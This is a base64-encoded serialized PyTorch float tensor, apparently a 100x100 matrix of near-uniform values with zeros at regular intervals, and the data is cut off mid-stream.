kgaqhQGS6AAk3pAy6AAn1xAChYEAAAAHByb3RvY29sX3ZlcnNpb25xAU3pA1gNAAAAbGl0dGxlX2VuZGlhbnECiFgKAAAAdHlwZV9zaXplc3EDfXEEKFgFAAAAc2hvcnRxBUsCWAMAAABpbnRxBksEWAQAAABsb25ncQdLBHV1LoACKFgHAAAAc3RvcmFnZXEAY3RvcmNoCkZsb2F0U3RvcmFnZQpxAVgOAAAAOTQ0MDUzMjM5MTc4MjRxAlgDAAAAY3B1cQNNECdOdHEEUS6AAl1xAFgOAAAAOTQ0MDUzMjM5MTc4MjRxAWEuECcAAAAAAAAAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8t